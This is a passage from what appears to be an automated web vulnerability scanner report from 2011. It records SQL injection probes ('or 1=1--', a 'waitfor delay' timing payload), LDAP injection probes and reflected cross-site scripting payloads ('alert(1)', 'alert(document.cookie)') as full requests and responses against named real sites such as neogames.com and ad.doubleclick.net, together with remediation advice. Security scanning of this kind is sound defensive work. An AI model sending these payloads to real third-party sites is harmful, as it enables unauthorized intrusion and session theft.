User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pscref=; plstat=0; ARC=130137

Response

HTTP/1.1 500 Internal Server Error
Date: Mon, 16 May 2011 11:45:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 531
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQBCDAQB=LGFGLCIAIFPMDMCAJENJMCKD; path=/
Cache-control: private

<html>
<head>
<link rel="p3pv1" href="/w3c/p3p.xml"></link>
</head>
EXEC sp_pixel_insert 51waitfor delay'0:0:20'-- ,130137 ,5143, 201105160000 <font face="Arial" size=2>
<p>Microsoft OLE DB Provid
...[SNIP]...

1.11. http://www.interwetten.org/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.interwetten.org
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET / HTTP/1.1
Host: www.interwetten.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 16 May 2011 12:10:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6798

<html>
<head>
<title>Syntaxfehler in Zeichenfolge in Abfrageausdruck ''http://www.google.com/search?hl=en&amp;q='')'.</title>
<style>
body {font-family:"Verdana";font-
...[SNIP]...
</b>System.Data.OleDb.OleDbException: Syntaxfehler in Zeichenfolge in Abfrageausdruck ''http://www.google.com/search?hl=en&amp;q='')'.<br>
...[SNIP]...

Request 2

GET / HTTP/1.1
Host: www.interwetten.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:10:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=daqivy3db3w1hk455t45bdvf; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12643


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Hom
...[SNIP]...

1.12. http://www.neogames.com/our-partners [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /our-partners

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 45542616%20or%201%3d1--%20 and 45542616%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /our-partners?145542616%20or%201%3d1--%20=1 HTTP/1.1
Host: www.neogames.com
Proxy-Connection: keep-alive
Referer: http://neogames-tech.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Content-Length: 32146
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:39:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>


<?php// comments_template(); // Get wp-comments.php template ?>

<?php// posts_nav_link(' &#8212; ', __('&laquo; Newer Posts'), __('Older Posts &raquo;')); ?>


                       </td></tr>
                   </table>
               </td>

           </table>
               
       </td></tr>
   </table>
           

</td></tr>

</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-2893517-14");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>


Request 2

GET /our-partners?145542616%20or%201%3d2--%20=1 HTTP/1.1
Host: www.neogames.com
Proxy-Connection: keep-alive
Referer: http://neogames-tech.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Length: 31988
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
X-Pingback: http://www.neogames.com/xmlrpc.php
Date: Mon, 16 May 2011 11:36:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">

<head profile
...[SNIP]...
</div>





                       </td></tr>
                   </table>
               </td>

           </table>
               
       </td></tr>
   </table>
           

</td></tr>

</table>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-2893517-14");
pageTracker._trackPageview();
} catch(err) {}</script>
</body>
</html>



1.13. http://www.neogames.com/outbound/article/www.bet365.com [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /outbound/article/www.bet365.com

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14417416'%20or%201%3d1--%20 and 14417416'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /outbound/article/www.bet365.com?114417416'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:15:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

Request 2

GET /outbound/article/www.bet365.com?114417416'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=120915991.104022393.1305546031.1305546031.1305546031.1; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 0


2. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.neogames.com
Path:   /outbound/article/games.bet365.com

Issue detail

The __utma cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.

Request 1

GET /outbound/article/games.bet365.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=*)(sn=*; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 0

Request 2

GET /outbound/article/games.bet365.com HTTP/1.1
Host: www.neogames.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=120915991.1305546031.1.1.utmcsr=neogames-tech.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=*)!(sn=*; __utmc=120915991; __utmb=120915991.1.10.1305546031;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.3.5
Content-type: text/html
Content-Length: 139

<br />
<b>Deprecated</b>: Function split() is deprecated in <b>D:\Neogames\Websites\Neogames.com\redirects.php</b> on line <b>2</b><br />

3. Cross-site scripting (reflected)
There are 469 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecffa'-alert(1)-'64e16de441d was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ecffa'-alert(1)-'64e16de441d HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8279
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:53:06 GMT
Expires: Mon, 16 May 2011 12:53:06 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ecffa'-alert(1)-'64e16de441dhttp://pixel.quantserve.com/r;a=p-96ifrWFBpTdiA;labels=_click.adserver.doubleclick*http://www.worldofudraw.com/\">
...[SNIP]...

3.2. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce96a"-alert(1)-"177f32f4f53 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ce96a"-alert(1)-"177f32f4f53 HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 8279
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:53:02 GMT
Expires: Mon, 16 May 2011 12:53:02 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
JTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=ce96a"-alert(1)-"177f32f4f53http://pixel.quantserve.com/r;a=p-96ifrWFBpTdiA;labels=_click.adserver.doubleclick*http://www.worldofudraw.com/");

var fscUrl = url;

var fscUrlClickTagFound = false;

var wmode = "opaque";

var bg =
...[SNIP]...

3.3. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ec69"-alert(1)-"ecd7fe965c6 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ8ec69"-alert(1)-"ecd7fe965c6&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:29 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ8ec69"-alert(1)-"ecd7fe965c6&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldo
...[SNIP]...

3.4. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a0b8'-alert(1)-'f42e8ff9e63 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ4a0b8'-alert(1)-'f42e8ff9e63&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ4a0b8'-alert(1)-'f42e8ff9e63&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313&adurl=http%3a%2f%2fpixel.quantserve.com/r%3Ba%3Dp-96ifrWFBpTdiA%3Blabels%3D_click.adserver.doubleclick%2Ahttp%3A//www.worldo
...[SNIP]...

3.5. http://ad.doubleclick.net/adj/N3220.no_url_specifiedOX2959/B5443304.3 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3220.no_url_specifiedOX2959/B5443304.3

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d87af'-alert(1)-'92dc5cf3e85 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/N3220.no_url_specifiedOX2959/B5443304.3;sz=300x250;pc=%5BTPAS_ID%5D;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BApc75B3RTeGXDI33lQf9xI3pAZOBzLgCAAAAEAEgADgAWIvH7akmYMmGhYmIpIQQggEXY2EtcHViLTY5Mzk5NzU3ODQ1MDUzMTOyARB3d3cubWV0YWNhZmUuY29tugEJZ2ZwX2ltYWdlyAEJ2gFoaHR0cDovL3d3dy5tZXRhY2FmZS5jb20vZnBsYXllci8_NDcwMmQlMjIlM0UlM0NzY3JpcHQlM0VhbGVydChkb2N1bWVudC5jb29raWUpJTNDL3NjcmlwdCUzRWJlOTZhMjNmM2EzPTHgAQLAAgLgAgDqAhs2NzA3L21ldGEuaG9tZXBhZ2UvYWRtaW5Nc2f4AvDRHpAD4AOYA-ADqAMB0ASQTuAEAQ&num=0&sig=AGiWqty6ua9ZhZm-yloXPFnjUMe7ffbTzw&client=ca-pub-6939975784505313d87af'-alert(1)-'92dc5cf3e85&adurl=;ord=1372756456? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 16 May 2011 12:52:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8333

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\n\n<!-- Code auto-generated on Tue Apr 12 22:59:51 EDT 2011 -->\n\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
